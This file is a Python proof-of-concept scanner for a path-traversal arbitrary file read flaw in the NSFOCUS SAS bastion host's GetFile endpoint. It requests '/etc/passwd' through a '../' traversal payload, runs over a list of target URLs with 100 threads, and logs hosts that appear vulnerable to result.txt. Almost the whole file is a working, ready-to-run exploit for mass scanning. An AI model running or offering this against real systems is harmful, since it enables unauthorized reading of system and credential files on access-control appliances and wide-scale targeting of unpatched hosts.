import requests,sys,argparse,re,os,time
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

def banner():
    test = """██╗    ██╗   ██╗███╗   ███╗███████╗███╗   ██╗ ██████╗ 
██║    ██║   ██║████╗ ████║██╔════╝████╗  ██║██╔════╝ 
██║    ██║   ██║██╔████╔██║█████╗  ██╔██╗ ██║██║  ███╗
██║    ╚██╗ ██╔╝██║╚██╔╝██║██╔══╝  ██║╚██╗██║██║   ██║
███████╗╚████╔╝ ██║ ╚═╝ ██║███████╗██║ ╚████║╚██████╔╝
╚══════╝ ╚═══╝  ╚═╝     ╚═╝╚══════╝╚═╝  ╚═══╝ ╚═════╝ 
                                                      

"""
    print(test)

def main():
    banner()
    parser = argparse.ArgumentParser(description="绿盟 SAS堡垒机 GetFile 任意文件读取漏洞")
    parser.add_argument('-u','--url',dest='url',type=str,help='please input url')
    parser.add_argument('-f','--file',dest='file',type=str,help='please input file')
    args = parser.parse_args()
    if args.url and not args.file:
        poc(args.url)
    if args.file and not args.url:
        url_list = []
        with open(args.file,'r',encoding='utf-8') as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp = Pool(100)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")



def poc(target):
    payload = '/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd'
    try:
        res1 = requests.get(url=target+payload,verify=False,timeout=5)
        if 'opt' in res1.text:
            print(f"[+]{target} 存在漏洞")
            with open('result.txt','a') as fp:
                fp.write(target+'\n')
        else:
            print(f"[-]{target} 不存在")
    except:
        print(f"[-]{target}    请求异常")
if __name__ =='__main__':
    main()
